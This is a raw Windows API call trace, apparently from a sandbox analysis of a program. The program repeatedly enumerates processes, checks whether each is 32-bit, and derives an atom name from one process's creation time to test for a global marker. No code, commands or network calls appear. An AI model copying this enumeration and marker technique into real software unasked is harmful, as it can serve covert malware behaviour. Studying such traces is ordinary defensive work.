	[0107.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.261] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.261] CloseHandle (hObject=0x694) returned 1
	[0107.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.261] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.261] CloseHandle (hObject=0x694) returned 1
	[0107.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.261] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.261] CloseHandle (hObject=0x694) returned 1
	[0107.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.262] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.262] CloseHandle (hObject=0x694) returned 1
	[0107.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.262] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.262] CloseHandle (hObject=0x694) returned 1
	[0107.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.262] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.262] CloseHandle (hObject=0x694) returned 1
	[0107.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.262] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.262] CloseHandle (hObject=0x694) returned 1
	[0107.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.262] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.262] CloseHandle (hObject=0x694) returned 1
	[0107.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.263] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.263] CloseHandle (hObject=0x694) returned 1
	[0107.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.263] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.263] CloseHandle (hObject=0x694) returned 1
	[0107.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.263] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.263] CloseHandle (hObject=0x694) returned 1
	[0107.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.263] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.263] CloseHandle (hObject=0x694) returned 1
	[0107.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.263] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.263] CloseHandle (hObject=0x694) returned 1
	[0107.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.263] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.263] CloseHandle (hObject=0x694) returned 1
	[0107.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.264] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.264] CloseHandle (hObject=0x694) returned 1
	[0107.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.264] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.264] CloseHandle (hObject=0x694) returned 1
	[0107.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.264] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.264] CloseHandle (hObject=0x694) returned 1
	[0107.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.264] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.264] CloseHandle (hObject=0x694) returned 1
	[0107.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.264] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.264] CloseHandle (hObject=0x694) returned 1
	[0107.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.265] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.265] CloseHandle (hObject=0x694) returned 1
	[0107.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.265] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.265] CloseHandle (hObject=0x694) returned 1
	[0107.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.265] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.265] CloseHandle (hObject=0x694) returned 1
	[0107.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.265] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.265] CloseHandle (hObject=0x694) returned 1
	[0107.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.265] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.265] CloseHandle (hObject=0x694) returned 1
	[0107.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.266] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.266] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.266] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.266] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.266] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.267] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.267] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.267] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.267] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.267] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.267] CloseHandle (hObject=0x694) returned 1
	[0107.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.267] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.267] CloseHandle (hObject=0x694) returned 1
	[0107.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.268] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.268] CloseHandle (hObject=0x694) returned 1
	[0107.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.268] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.268] CloseHandle (hObject=0x694) returned 1
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.312] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.312] CloseHandle (hObject=0x694) returned 1
	[0107.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.313] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.313] CloseHandle (hObject=0x694) returned 1
	[0107.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.313] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.313] CloseHandle (hObject=0x694) returned 1
	[0107.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.314] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.314] CloseHandle (hObject=0x694) returned 1
	[0107.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.314] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.314] CloseHandle (hObject=0x694) returned 1
	[0107.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.314] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.314] CloseHandle (hObject=0x694) returned 1
	[0107.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.314] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.314] CloseHandle (hObject=0x694) returned 1
	[0107.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.314] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.315] CloseHandle (hObject=0x694) returned 1
	[0107.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.315] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.315] CloseHandle (hObject=0x694) returned 1
	[0107.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.315] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.315] CloseHandle (hObject=0x694) returned 1
	[0107.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.315] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.315] CloseHandle (hObject=0x694) returned 1
	[0107.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.315] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.316] CloseHandle (hObject=0x694) returned 1
	[0107.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.316] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.316] CloseHandle (hObject=0x694) returned 1
	[0107.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.316] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.316] CloseHandle (hObject=0x694) returned 1
	[0107.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.316] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.316] CloseHandle (hObject=0x694) returned 1
	[0107.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.316] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.316] CloseHandle (hObject=0x694) returned 1
	[0107.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.317] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.317] CloseHandle (hObject=0x694) returned 1
	[0107.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.317] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.317] CloseHandle (hObject=0x694) returned 1
	[0107.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.317] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.317] CloseHandle (hObject=0x694) returned 1
	[0107.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.317] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.317] CloseHandle (hObject=0x694) returned 1
	[0107.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.317] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.318] CloseHandle (hObject=0x694) returned 1
	[0107.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.318] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.318] CloseHandle (hObject=0x694) returned 1
	[0107.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.318] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.318] CloseHandle (hObject=0x694) returned 1
	[0107.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.318] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.318] CloseHandle (hObject=0x694) returned 1
	[0107.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.318] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.318] CloseHandle (hObject=0x694) returned 1
	[0107.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.319] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.319] CloseHandle (hObject=0x694) returned 1
	[0107.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.319] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.319] CloseHandle (hObject=0x694) returned 1
	[0107.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.319] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.319] CloseHandle (hObject=0x694) returned 1
	[0107.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.319] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.320] CloseHandle (hObject=0x694) returned 1
	[0107.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.320] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.320] CloseHandle (hObject=0x694) returned 1
	[0107.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.320] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.320] CloseHandle (hObject=0x694) returned 1
	[0107.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.320] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.321] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.321] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.321] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.321] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.322] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.322] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.322] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.322] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.322] CloseHandle (hObject=0x694) returned 1
	[0107.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.322] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.322] CloseHandle (hObject=0x694) returned 1
	[0107.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.322] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.322] CloseHandle (hObject=0x694) returned 1
	[0107.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.323] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.323] CloseHandle (hObject=0x694) returned 1
	[0107.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.360] CloseHandle (hObject=0x694) returned 1
	[0107.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.361] CloseHandle (hObject=0x694) returned 1
	[0107.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.361] CloseHandle (hObject=0x694) returned 1
	[0107.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.362] CloseHandle (hObject=0x694) returned 1
	[0107.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.362] CloseHandle (hObject=0x694) returned 1
	[0107.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.362] CloseHandle (hObject=0x694) returned 1
	[0107.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.362] CloseHandle (hObject=0x694) returned 1
	[0107.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.362] CloseHandle (hObject=0x694) returned 1
	[0107.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.363] CloseHandle (hObject=0x694) returned 1
	[0107.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.363] CloseHandle (hObject=0x694) returned 1
	[0107.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.363] CloseHandle (hObject=0x694) returned 1
	[0107.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.363] CloseHandle (hObject=0x694) returned 1
	[0107.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.364] CloseHandle (hObject=0x694) returned 1
	[0107.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.364] CloseHandle (hObject=0x694) returned 1
